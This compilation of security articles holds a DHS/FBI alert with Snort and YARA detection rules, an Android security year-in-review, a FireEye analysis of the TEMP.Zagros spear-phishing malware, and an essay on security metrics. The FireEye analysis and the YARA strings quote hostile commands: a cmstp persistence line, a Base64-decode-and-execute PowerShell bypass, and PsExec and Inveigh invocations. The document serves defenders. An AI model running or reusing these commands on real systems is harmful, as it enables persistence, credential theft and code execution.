alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/aspnet_client/system_web/4_0_30319/update/' (Beacon)"; sid:42000000; rev:1; flow:established,to_server; content:"/aspnet_client/system_web/4_0_30319/update/"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/img/bson021.dat'"; sid:42000001; rev:1; flow:established,to_server; content:"/img/bson021.dat"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/A56WY' (Callback)"; sid:42000002; rev:1; flow:established,to_server; content:"/A56WY"; http_uri; fast_pattern; classtype:bad-unknown; metadata:service http;)


alert tcp any any -> any 445 (msg:"SMB Client Request contains 'AME_ICON.PNG' (SMB credential harvesting)"; sid:42000003; rev:1; flow:established,to_server; content:"|FF|SMB|75 00 00 00 00|"; offset:4; depth:9; content:"|08 00 01 00|"; distance:3; content:"|00 5c 5c|"; distance:2; within:3; content:"|5c|AME_ICON.PNG"; distance:7; fast_pattern; classtype:bad-unknown; metadata:service netbios-ssn;)


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI OPTIONS contains '/ame_icon.png' (SMB credential harvesting)"; sid:42000004; rev:1; flow:established,to_server; content:"/ame_icon.png"; http_uri; fast_pattern:only; content:"OPTIONS"; nocase; http_method; classtype:bad-unknown; metadata:service http;)


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP Client Header contains 'User-Agent|3a 20|Go-http-client/1.1'"; sid:42000005; rev:1; flow:established,to_server; content:"User-Agent|3a 20|Go-http-client/1.1|0d 0a|Accept-Encoding|3a 20|gzip"; http_header; fast_pattern:only; pcre:"/\.(?:aspx|txt)\?[a-z0-9]{3}=[a-z0-9]{32}&/U"; classtype:bad-unknown; metadata:service http;)


alert tcp $EXTERNAL_NET [139,445] -> $HOME_NET any (msg:"SMB Server Traffic contains NTLM-Authenticated SMBv1 Session"; sid:42000006; rev:1; flow:established,to_client; content:"|ff 53 4d 42 72 00 00 00 00 80|"; fast_pattern:only; content:"|05 00|"; distance:23; classtype:bad-unknown; metadata:service netbios-ssn;)

YARA Rules

This is a consolidated rule set for malware associated with this activity. These rules were written by NCCIC and include contributions from trusted partners.



rule APT_malware_1



            description = "inveigh pen testing tools & related artifacts"

            author = "DHS | NCCIC Code Analysis Team"    

            date = "2017/07/17"

            hash0 = "61C909D2F625223DB2FB858BBDF42A76"

            hash1 = "A07AA521E7CAFB360294E56969EDA5D6"

            hash2 = "BA756DD64C1147515BA2298B6A760260"

            hash3 = "8943E71A8C73B5E343AA9D2E19002373"

            hash4 = "04738CA02F59A5CD394998A99FCD9613"

            hash5 = "038A97B4E2F37F34B255F0643E49FC9D"

            hash6 = "65A1A73253F04354886F375B59550B46"

            hash7 = "AA905A3508D9309A93AD5C0EC26EBC9B"

            hash8 = "5DBEF7BDDAF50624E840CCBCE2816594"

            hash9 = "722154A36F32BA10E98020A8AD758A7A"

            hash10 = "4595DBE00A538DF127E0079294C87DA0"


            $s0 = "file://"

            $s1 = "/ame_icon.png"

            $s2 = ""

            $s3 = { 87D081F60C67F5086A003315D49A4000F7D6E8EB12000081F7F01BDD21F7DE }

            $s4 = { 33C42BCB333DC0AD400043C1C61A33C3F7DE33F042C705B5AC400026AF2102 }

            $s5 = "(g.charCodeAt(c)^l[(l[b]+l[e])%256])"

            $s6 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)"

            $s7 = "VXNESWJfSjY3grKEkEkRuZeSvkE="

            $s8 = "NlZzSZk="

            $s9 = "WlJTb1q5kaxqZaRnser3sw=="

            $s10 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)"

            $s11 = "fromCharCode(d.charCodeAt(e)^k[(k[b]+k[h])%256])"

            $s12 = "ps.exe -accepteula \\%ws% -u %user% -p %pass% -s cmd /c netstat"

            $s13 = { 22546F6B656E733D312064656C696D733D5C5C222025254920494E20286C6973742E74787429 }

            $s14 = { 68656C6C2E657865202D6E6F65786974202D657865637574696F6E706F6C69637920627970617373202D636F6D6D616E6420222E202E5C496E76656967682E70 }

            $s15 = { 476F206275696C642049443A202266626433373937623163313465306531 }

//inveigh pentesting tools

            $s16 = { 24696E76656967682E7374617475735F71756575652E4164642822507265737320616E79206B657920746F2073746F70207265616C2074696D65 }

//specific malicious word document PK archive

            $s17 = { 2F73657474696E67732E786D6CB456616FDB3613FEFE02EF7F10F4798E64C54D06A14ED125F19A225E87C9FD0194485B }

            $s18 = { 6C732F73657474696E67732E786D6C2E72656C7355540500010076A41275780B0001040000000004000000008D90B94E03311086EBF014D6F4D87B48214471D2 }

            $s19 = { 8D90B94E03311086EBF014D6F4D87B48214471D210A41450A0E50146EBD943F8923D41C9DBE3A54A240ACA394A240ACA39 }

            $s20 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }

            $s21 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }

            $s22 = ""

            $s23 = ""

            $s24 = "/1/ree_stat/p"

            $s25 = "/icon.png"

            $s26 = "/pshare1/icon"

            $s27 = "/notepad.png"

            $s28 = "/pic.png"

            $s29 = ""



            ($s0 and $s1 or $s2) or ($s3 or $s4) or ($s5 and $s6 or $s7 and $s8 and $s9) or ($s10 and $s11) or ($s12 and $s13) or ($s14) or ($s15) or ($s16) or ($s17) or ($s18) or ($s19) or ($s20) or ($s21) or ($s0 and $s22 or $s24) or ($s0 and $s22 or $s25) or ($s0 and $s23 or $s26) or ($s0 and $s22 or $s27) or ($s0 and $s23 or $s28) or ($s29)





rule APT_malware_2



      description = "rule detects malware"

      author = "other"



      $api_hash = { 8A 08 84 C9 74 0D 80 C9 60 01 CB C1 E3 01 03 45 10 EB ED }

      $http_push = "X-mode: push" nocase

      $http_pop = "X-mode: pop" nocase



      any of them





rule Query_XML_Code_MAL_DOC_PT_2



     name= "Query_XML_Code_MAL_DOC_PT_2"

     author = "other"




            $zip_magic = { 50 4b 03 04 }

            $dir1 = "word/_rels/settings.xml.rels"

            $bytes = {8c 90 cd 4e eb 30 10 85 d7}



            $zip_magic at 0 and $dir1 and $bytes





rule Query_Javascript_Decode_Function



      name= "Query_Javascript_Decode_Function"

      author = "other"



      $decode1 = {72 65 70 6C 61 63 65 28 2F 5B 5E 41 2D 5A 61 2D 7A 30 2D 39 5C 2B 5C 2F 5C 3D 5D 2F 67 2C 22 22 29 3B}

      $decode2 = {22 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F 3D 22 2E 69 6E 64 65 78 4F 66 28 ?? 2E 63 68 61 72 41 74 28 ?? 2B 2B 29 29}

      $decode3 = {3D ?? 3C 3C 32 7C ?? 3E 3E 34 2C ?? 3D 28 ?? 26 31 35 29 3C 3C 34 7C ?? 3E 3E 32 2C ?? 3D 28 ?? 26 33 29 3C 3C 36 7C ?? 2C ?? 2B 3D [1-2] 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29 2C 36 34 21 3D ?? 26 26 28 ?? 2B 3D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29}

      $decode4 = {73 75 62 73 74 72 69 6E 67 28 34 2C ?? 2E 6C 65 6E 67 74 68 29}




      filesize < 20KB and #func_call > 20 and all of ($decode*)






rule Query_XML_Code_MAL_DOC



      name= "Query_XML_Code_MAL_DOC"

      author = "other"



      $zip_magic = { 50 4b 03 04 }

      $dir = "word/_rels/" ascii

      $dir2 = "word/theme/theme1.xml" ascii

      $style = "word/styles.xml" ascii



      $zip_magic at 0 and $dir at 0x0145 and $dir2 at 0x02b7 and $style at 0x08fd





rule z_webshell



            description = "Detection for the z_webshell"

            author = "DHS NCCIC Hunt and Incident Response Team"

            date = "2018/01/25"

            md5 =  "2C9095C965A55EFC46E16B86F9B7D6C6"



            $aspx_identifier1 = "<%@ " nocase ascii wide

            $aspx_identifier2 = "<asp:" nocase ascii wide

            $script_import = /(import|assembly) Name(space)?\=\"(System|Microsoft)/ nocase ascii wide

            $case_string = /case \"z_(dir|file|FM|sql)_/ nocase ascii wide

            $webshell_name = "public string z_progname =" nocase ascii wide

            $webshell_password = "public string Password =" nocase ascii wide



            1 of ($aspx_identifier*)

            and #script_import > 10

            and #case_string > 7

            and 2 of ($webshell_*)

            and filesize < 100KB



This actors’ campaign has affected multiple organizations in the energy, nuclear, water, aviation, construction, and critical manufacturing sectors.


DHS and FBI encourage network users and administrators to use the following detection and prevention guidelines to help defend against this activity.


Network and Host-based Signatures

DHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, and YARA and Snort signatures provided and add the IPs to their watch list to determine whether malicious activity is occurring within their organization. Reviewing network perimeter netflow will help determine whether a network has experienced suspicious activity. Network defenders and malware analysts should use the YARA and Snort signatures provided in the associated YARA and .txt file to identify malicious activity.


Detections and Prevention Measures

  • Users and administrators may detect spear phishing, watering hole, web shell, and remote access activity by comparing all IP addresses and domain names listed in the IOC packages to the following locations:
    • network intrusion detection system/network intrusion protection system logs,
    • web content logs,
    • proxy server logs,
    • domain name server resolution logs,
    • packet capture (PCAP) repositories,
    • firewall logs,
    • workstation Internet browsing history logs,
    • host-based intrusion detection system /host-based intrusion prevention system (HIPS) logs,
    • data loss prevention logs,
    • exchange server logs,
    • user mailboxes,
    • mail filter logs,
    • mail content logs,
    • AV mail logs,
    • OWA logs,
    • Blackberry Enterprise Server logs, and
    • Mobile Device Management logs.
  • To detect the presence of web shells on external-facing servers, compare IP addresses, filenames, and file hashes listed in the IOC packages with the following locations:
    • application logs,
    • IIS/Apache logs,
    • file system,
    • intrusion detection system/ intrusion prevention system logs,
    • PCAP repositories,
    • firewall logs, and
    • reverse proxy.
  • Detect spear-phishing by searching workstation file systems and network-based user directories, for attachment filenames and hashes found in the IOC packages.
  • Detect persistence in VDI environments by searching file shares containing user profiles for all .lnk files.
  • Detect evasion techniques by the actors by identifying deleted logs. This can be done by reviewing last-seen entries and by searching for event 104 on Windows system logs.
  • Detect persistence by reviewing all administrator accounts on systems to identify unauthorized accounts, especially those created recently.
  • Detect the malicious use of legitimate credentials by reviewing the access times of remotely accessible systems for all users. Any unusual login times should be reviewed by the account owners.
  • Detect the malicious use of legitimate credentials by validating all remote desktop and VPN sessions of any user’s credentials suspected to be compromised.
  • Detect spear-phishing by searching OWA logs for all IP addresses listed in the IOC packages.
  • Detect spear-phishing through a network by validating all new email accounts created on mail servers, especially those with external user access.
  • Detect persistence on servers by searching system logs for all filenames listed in the IOC packages.
  • Detect lateral movement and privilege escalation by searching PowerShell logs for all filenames ending in “.ps1” contained in the IOC packages. (Note: requires PowerShell version 5, and PowerShell logging must be enabled prior to the activity.)
  • Detect persistence by reviewing all installed applications on critical systems for unauthorized applications, specifically note FortiClient VPN and Python 2.7.
  • Detect persistence by searching for the value of “REG_DWORD 100” at registry location “HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal”. Services\MaxInstanceCount” and the value of “REG_DWORD 1” at location “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\dontdisplaylastusername”.
  • Detect installation by searching all proxy logs for downloads from URIs without domain names.


General Best Practices Applicable to this Campaign:

  • Prevent external communication of all versions of SMB and related protocols at the network boundary by blocking TCP ports 139 and 445 with related UDP port 137. See the NCCIC/US-CERT publication on SMB Security Best Practices for more information.
  • Block the Web-based Distributed Authoring and Versioning (WebDAV) protocol on border gateway devices on the network.
  • Monitor VPN logs for abnormal activity (e.g., off-hour logins, unauthorized IP address logins, and multiple concurrent logins).
  • Deploy web and email filters on the network. Configure these devices to scan for known bad domain names, sources, and addresses; block these before receiving and downloading messages. This action will help to reduce the attack surface at the network’s first level of defense. Scan all emails, attachments, and downloads (both on the host and at the mail gateway) with a reputable anti-virus solution that includes cloud reputation services.
  • Segment any critical networks or control systems from business systems and networks according to industry best practices.
  • Ensure adequate logging and visibility on ingress and egress points.
  • Ensure the use of PowerShell version 5, with enhanced logging enabled. Older versions of PowerShell do not provide adequate logging of the PowerShell commands an attacker may have executed. Enable PowerShell module logging, script block logging, and transcription. Send the associated logs to a centralized log repository for monitoring and analysis. See the FireEye blog post Greater Visibility through PowerShell Logging for more information.
  • Implement the prevention, detection, and mitigation strategies outlined in the NCCIC/US-CERT Alert TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance.
  • Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis, and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.
  • Implement application directory whitelisting. System administrators may implement application or application directory whitelisting through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), SYSTEM32, and any ICS software folders. All other locations should be disallowed unless an exception is granted.
  • Block RDP connections originating from untrusted external addresses unless an exception exists; routinely review exceptions on a regular basis for validity.
  • Store system logs of mission critical systems for at least one year within a security information event management tool.
  • Ensure applications are configured to log the proper level of detail for an incident response investigation.
  • Consider implementing HIPS or other controls to prevent unauthorized code execution.
  • Establish least-privilege controls.
  • Reduce the number of Active Directory domain and enterprise administrator accounts.
  • Based on the suspected level of compromise, reset all user, administrator, and service account credentials across all local and domain systems.
  • Establish a password policy to require complex passwords for all users.
  • Ensure that accounts for network administration do not have external connectivity.
  • Ensure that network administrators use non-privileged accounts for email and Internet access.
  • Use two-factor authentication for all authentication, with special emphasis on any external-facing interfaces and high-risk environments (e.g., remote access, privileged access, and access to sensitive data).
  • Implement a process for logging and auditing activities conducted by privileged accounts.
  • Enable logging and alerting on privilege escalations and role changes.
  • Periodically conduct searches of publically available information to ensure no sensitive information has been disclosed. Review photographs and documents for sensitive data that may have inadvertently been included.
  • Assign sufficient personnel to review logs, including records of alerts.
  • Complete independent security (as opposed to compliance) risk review.
  • Create and participate in information sharing programs.
  • Create and maintain network and system documentation to aid in timely incident response. Documentation should include network diagrams, asset owners, type of asset, and an incident response plan.


Report Notice

DHS encourages recipients who identify the use of tools or techniques discussed in this document to report information to DHS or law enforcement immediately. To request incident response resources or technical assistance, contact NCCIC at or 888-282-0870 and the FBI through a local field office or the FBI’s Cyber Division ( or 855-292-3937).


Revision History

  • March 15, 2018: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Android Security 2017 Year in Review

Our team’s goal is simple: secure more than two billion Android devices. It’s our entire focus, and we’re constantly working to improve our protections to keep users safe.
Today, we’re releasing our fourth annual Android Security Year in Review. We compile these reports to help educate the public about the many different layers of Android security, and also to hold ourselves accountable so that anyone can track our security work over time.
We saw really positive momentum last year and this post includes some, but not nearly all, of the major moments from 2017. To dive into all the details, you can read the full report at:

Google Play Protect

In May, we announced Google Play Protect, a new home for the suite of Android security services on nearly two billion devices. While many of Play Protect’s features had been securing Android devices for years, we wanted to make these more visible to help assure people that our security protections are constantly working to keep them safe.

Play Protect’s core objective is to shield users from Potentially Harmful Apps, or PHAs. Every day, it automatically reviews more than 50 billion apps, other potential sources of PHAs, and devices themselves and takes action when it finds any.

Play Protect uses a variety of different tactics to keep users and their data safe, but the impact of machine learning is already quite significant: 60.3% of all Potentially Harmful Apps were detected via machine learning, and we expect this to increase in the future.
Protecting users' devices
Play Protect automatically checks Android devices for PHAs at least once every day, and users can conduct an additional review at any time for some extra peace of mind. These automatic reviews enabled us to remove nearly 39 million PHAs last year.

We also update Play Protect to respond to trends that we detect across the ecosystem. For instance, we recognized that nearly 35% of new PHA installations were occurring when a device was offline or had lost network connectivity. As a result, in October 2017, we enabled offline scanning in Play Protect, and have since prevented 10 million more PHA installs.

Preventing PHA downloads
Devices that downloaded apps exclusively from Google Play were nine times less likely to get a PHA than devices that downloaded apps from other sources. And these security protections continue to improve, partially because of Play Protect’s increased visibility into newly submitted apps to Play. It reviewed 65% more Play apps compared to 2016.

Play Protect also doesn’t just secure Google Play—it helps protect the broader Android ecosystem as well. Thanks in large part to Play Protect, the installation rates of PHAs from outside of Google Play dropped by more than 60%.

Security updates

While Google Play Protect is a great shield against harmful PHAs, we also partner with device manufacturers to make sure that the version of Android running on users' devices is up-to-date and secure.

Throughout the year, we worked to improve the process for releasing security updates, and 30% more devices received security patches than in 2016. Furthermore, no critical security vulnerabilities affecting the Android platform were publicly disclosed without an update or mitigation available for Android devices. This was possible due to the Android Security Rewards Program, enhanced collaboration with the security researcher community, coordination with industry partners, and built-in security features of the Android platform.

New security features in Android Oreo

We introduced a slew of new security features in Android Oreo: making it safer to get apps, dropping insecure network protocols, providing more user control over identifiers, hardening the kernel, and more.

We highlighted many of these over the course of the year, but some may have flown under the radar. For example, we updated the overlay API so that apps can no longer block the entire screen and prevent you from dismissing them, a common tactic employed by ransomware.

Openness makes Android security stronger

We’ve long said it, but it remains truer than ever: Android’s openness helps strengthen our security protections. For years, the Android ecosystem has benefitted from researchers’ findings, and 2017 was no different.

Security reward programs
We continued to see great momentum with our Android Security Rewards program: we paid researchers $1.28 million dollars, pushing our total rewards past $2 million dollars since the program began. We also increased our top-line payouts for exploits that compromise TrustZone or Verified Boot from $50,000 to $200,000, and remote kernel exploits from $30,000 to $150,000.

In parallel, we introduced Google Play Security Rewards Program and offered a bonus bounty to developers that discover and disclose select critical vulnerabilities in apps hosted on Play to their developers.

External security competitions
Our teams also participated in external vulnerability discovery and disclosure competitions, such as Mobile Pwn2Own. At the 2017 Mobile Pwn2Own competition, no exploits successfully compromised the Google Pixel. And of the exploits demonstrated against devices running Android, none could be reproduced on a device running unmodified Android source code from the Android Open Source Project (AOSP).

We’re pleased to see the positive momentum behind Android security, and we’ll continue our work to improve our protections this year, and beyond. We will never stop our work to ensure the security of Android users.

Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign


From January 2018 to March 2018, through FireEye’s Dynamic Threat Intelligence, we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East.

We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. The spear phishing emails and attached malicious macro documents typically have geopolitical themes. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS.

One of the more interesting observations during the analysis of these files was the re-use of the latest AppLocker bypass, and lateral movement techniques for the purpose of indirect code execution. The IP address in the lateral movement techniques was substituted with the local machine IP address to achieve code execution on the system.

Campaign Timeline

In this campaign, the threat actor’s tactics, techniques and procedures (TTPs) shifted after about a month, as did their targets. A brief timeline of this activity is shown in Figure 1.

Figure 1: Timeline of this recently observed spear phishing campaign

The first part of the campaign (From Jan. 23, 2018, to Feb. 26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains the Base64 encoded PowerShell command, which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe. The process chain is shown in Figure 2.

Figure 2: Process chain for the first part of the campaign

Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of process tree, its final purpose remained same: invoking PowerShell to decode the Base64 encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it. One such example of the VBS invoking PowerShell via MSHTA is shown in Figure 3.

Figure 3: VBS invoking PowerShell via MSHTA

The second part of the campaign (from Feb. 27, 2018, to March 5, 2018) used a new variant of the macro that does not use VBS for PowerShell code execution. Instead, it uses one of the recently disclosed code execution techniques leveraging INF and SCT files, which we will go on to explain later in the blog.

Infection Vector

We believe the infection vector for all of the attacks involved in this campaign are macro-based documents sent as an email attachment. One such email that we were able to obtain was targeting users in Turkey, as shown in Figure 4:

Figure 4: Sample spear phishing email containing macro-based document attachment

The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey, Pakistan, Tajikistan and India. What follows is four examples, and a complete list is available in the Indicators of Compromise section at the end of the blog.

Figure 5 shows a document purporting to be from the National Assembly of Pakistan.

Figure 5: Document purporting to be from the National Assembly of Pakistan

A document purporting to be from the Turkish Armed Forces, with content written in the Turkish language, is shown in Figure 6.

Figure 6: Document purporting to be from the Turkish Armed Forces

A document purporting to be from the Institute for Development and Research in Banking Technology (established by the Reserve Bank of India) is shown in Figure 7.

Figure 7: Document purporting to be from the Institute for Development and Research in Banking Technology

Figure 8 shows a document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan.

Figure 8: Document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan

Each of these macro-based documents used similar techniques for code execution, persistence and communication with the command and control (C2) server.

Indirect Code Execution Through INF and SCT

This scriptlet code execution technique leveraging INF and SCT files was recently discovered and documented in February 2018. The threat group in this recently observed campaign – TEMP.Zagros – weaponized their malware using the following techniques.

The macro in the Word document drops three files in a hard coded path: C:\programdata. Since the path is hard coded, the execution will only be observed in operating systems, Windows 7 and above. The following are the three files:

  • Defender.sct – The malicious JavaScript based scriptlet file.
  • DefenderService.inf – The INF file that is used to invoke the above scriptlet file.
  • WindowsDefender.ini – The Base64 encoded and obfuscated PowerShell script.

After dropping the three files, the macro will set the following registry key to achieve persistence:

= cmstp.exe /s c:\programdata\DefenderService.inf

Upon system restart, cmstp.exe will be used to execute the SCT file indirectly through the INF file. This is possible because inside the INF file we have the following section:


That section gets indirectly invoked through the DefaultInstall_SingleUser section of INF, as shown in Figure 9.

Figure 9: Indirectly invoking SCT through the DefaultInstall_SingleUser section of INF

This method of code execution is performed in an attempt to evade security products. FireEye MVX and HX Endpoint Security technology successfully detect this code execution technique.

SCT File Analysis

The code of the Defender.sct file is an obfuscated JavaScript. The main function performed by the SCT file is to Base64 decode the contents of WindowsDefender.ini file and execute the decoded PowerShell Script using the following command line:

powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\WindowsDefender.ini)

The rest of the malicious activities are performed by the PowerShell Script.

PowerShell File Analysis

The PowerShell script employs several layers of obfuscation to hide its actual functionality. In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools.

Some of the key obfuscation techniques used are:

  • Character Replacement: Several instances of character replacement and string reversing techniques (Figure 10) make analysis difficult.

Figure 10: Character replacement and string reversing techniques

  • PowerShell Environment Variables: Nowadays, malware authors commonly mask critical strings such as “IEX” using environment variables. Some of the instances used in this script are:
    • $eNv:puBLic[13]+$ENv:pUBLIc[5]+'x'
    • ($ENV:cOMsPEC[4,26,25]-jOin'')
  • XOR encoding: The biggest section of the PowerShell script is XOR encoded using a single byte key, as shown in Figure 11.

Figure 11: PowerShell script is XOR encoded using a single byte key

After deobfuscating the contents of the PowerShell Script, we can divide it into three sections.

Section 1

The first section of the PowerShell script is responsible for setting different key variables that are used by the remaining sections of the PowerShell script, especially the following variables:

  • TEMpPAtH = "C:\ProgramData\" (the path used for storing the temp files)
  • Get_vAlIdIP = (used to get the public IP address of the machine)
  • FIlENAmePATHP = WindowsDefender.ini (file used to store Powershell code)
  • PRIVAtE = Private Key exponents
  • PUbLIc = Public Key exponents
  • Hklm = "HKLM:\Software\"
  • Hkcu = "HKCU:\Software\"
  • ValuE = "kaspersky"
  • DrAGon_MidDLe = [array of proxy URLs]

Among those variables, there is one variable of particular interest, DrAGon_MidDLe, which stores the list of proxy URLs (detailed at the end of the blog in the Network Indicators portion of the Indicators of Compromise section) that will be used to interact with the C2 server, as shown in Figure 12.

Figure 12: DrAGon_MidDLe stores the list of proxy URLs used to interact with C2 server

Section 2

The second section of the PowerShell script has the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server. The algorithm used for encryption and decryption is RSA, which leverages the public and private key exponents included in Section 1 of the PowerShell script.

Section 3

The third section of the PowerShell script is the biggest section and has a wide variety of functionalities.

During analysis, we observed a code section where a message written in Chinese and hard coded in the script will be printed in the case of an error while connecting to the C2 server:

The English translation for this message is: “Cannot connect to website, please wait for dragon”.

Other functionalities provided by this section of the PowerShell Script are as follows:

  • Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables:
    • IP Address from Network Adapter Configuration
    • OS Name
    • OS Architecture
    • Computer Name
    • Computer Domain Name
    • Username

All of this data is concatenated and formatted as shown in Figure 13:

Figure 13: Concatenated and formatted data retrieved by PowerShell script

  • Register the victim’s machine to the C2 server by sending the REGISTER command to the server. In response, if the status is OK, then a TOKEN is received from the C2 server that is used to synchronize the activities between the victim’s machine and the C2 server.

While sending to the C2 server, the data is formatted as follows:

@{SYSINFO  = $get.ToString(); ACTION = "REGISTER";}

  • Ability to take screenshots.
  • Checks for the presence of security tools (detailed in the Appendix) and if any of these security tools are discovered, then the system will be shut down, as shown in Figure 14.

Figure 14: System shut down upon discovery of security tools

  • Ability to receive PowerShell script from the C2 server and execute on the machine. Several techniques are employed for executing the PowerShell code:
    • If command starts with “excel”, then it leverages DDEInitiate Method of Excel.Appilcation to execute the code: 
    • If the command starts with “outlook”, then it leverages Outlook.Application and MSHTA to execute the code: 
    • If the command starts with “risk”, then execution is performed through DCOM object: 
  • File upload functionality.
  • Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry:
    • DisableAttachmentsInPV
    • DisableInternetFilesInPV
    • DisableUnsafeLocationsInPV

Figure 15: Disabling Microsoft Office Protected View

  • Ability to remotely reboot or shut down or clean the system based on the command received from the C2 server, as shown in Figure 16.

Figure 16: Reboot, shut down and clean commands

  • Ability to sleep for a given number of seconds.

The following table summarizes the main C2 commands supported by this PowerShell Script.

C2 Command



Reboot the system using shutdown command


Shut down the system using shutdown command


Wipe the Drives, C:\, D:\, E:\, F:\


Take a screenshot of the System


Encrypt and upload the information from the system


Leverage Excel.Application COM object for code execution


Leverage Outlook.Application COM object for code execution


Leverage DCOM object for code execution


This activity shows us that TEMP.Zagros stays up-to-date with the latest code execution and persistence mechanism techniques, and that they can quickly leverage these techniques to update their malware. By combining multiple layers of obfuscation, they deter the process of reverse engineering and also attempt to evade security products.

Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

Macro based Documents and Hashes

SHA256 Hash


Targeted Region






Invest in Turkey.doc



güvenlik yönergesi. .doc







Türkiye Cumhuriyeti Kimlik Kartı.doc



Turkish Armed Forces.doc

























Connectel .pk.doc









Gvenlik Ynergesi.doc



Gvenlik Ynergesi.doc






Anadolu Güneydoğu Projesinde .doc


Network Indicators

List of Proxy URLs








































































































































































































































































































































































































































































Security Tools Checked on the Machine





























Measure Security Performance, Not Policy Compliance

I started my security (post-sysadmin) career heavily focused on security policy frameworks. It took me down many roads, but everything always came back to a few simple notions, such as that policies were a means of articulating security direction, that you had to prescriptively articulate desired behaviors, and that the more detail you could put into the guidance (such as in standards, baselines, and guidelines), the better off the organization would be. Except, of course, that in the real world nobody ever took time to read the more detailed documents, Ops and Dev teams really didn't like being told how to do their jobs, and, at the end of the day, I was frequently reminded that publishing a policy document didn't translate to implementation.

Subsequently, I've spent the past 10+ years thinking about better ways to tackle policies, eventually reaching the point where I believe "less is more" and that anything written and published in a place and format that isn't "work as usual" will rarely, if ever, get implemented without a lot of downward force applied. I've seen both good and bad policy frameworks within organizations. Often they cycle around between good and bad. Someone will build a nice policy framework, it'll get implemented in a number of key places, and then it will languish from neglect and inadequate upkeep until it's irrelevant and ignored. This is not a recipe for lasting success.

Thinking about it further this week, it occurred to me that part of the problem is thinking in the old "compliance" mindset. Policies are really to blame for driving us down the checkbox-compliance path. Sure, we can easily stand back and try to dictate rules, but without the adequate authority to enforce them, and without the resources needed to continually update them, they're doomed to obsolescence. Instead, we need to move to that "security as code" mentality and find ways to directly codify requirements in ways that are naturally adapted and maintained.

End Dusty Tomes and (most) Out-of-Band Guidance

The first daunting challenge of security policy framework reform is to throw away the old, broken approach with as much gusto and finality as possible. Yes, there will always be a need for certain formally documented policies, but overall an organization Does. Not. Need. large amounts of dusty tomes providing out-of-band guidance to a non-existent audience.

Now, note a couple things here. First, there is a time and a place for providing out-of-band guidance, such as via direct training programs. However, it should be the minority of guidance, and wherever possible you should seek to codify security requirements directly into systems, applications, and environments. For a significant subset of security practices, it turns out we do not need to repeatedly consider whether or not something should be done, but can instead make the decision once and then roll it out everywhere as necessary and appropriate.

Second, we have to realize and accept that traditional policy (and related) documents only serve a formal purpose, not a practical or pragmatic purpose. Essentially, the reason you put something into writing is because a) you're required to do so (such as by regulations), or b) you're driven to do so due to ongoing infractions or the inability to directly codify requirements (for example, requirements on human behavior). What this leaves you with are requirements that can be directly implemented and that are thus easily measurable.

KPIs as Policies (et al.)

If the old ways aren't working, then it's time to take a step back and think about why that might be and what might be better going forward. I'm convinced the answer to this query lies in stretching the "security as code" notion a step further by focusing on security performance metrics for everything and everyone instead of security policies. Specifically, if you think of policies as requirements, then you should be able to recast those as metrics and key performance indicators (KPIs) that are easily measured, and in turn are easily integrated into dashboards. Moreover, going down this path takes us into a much healthier sense of quantitative reasoning, which can pay dividends for improved information risk awareness, measurement, and management.

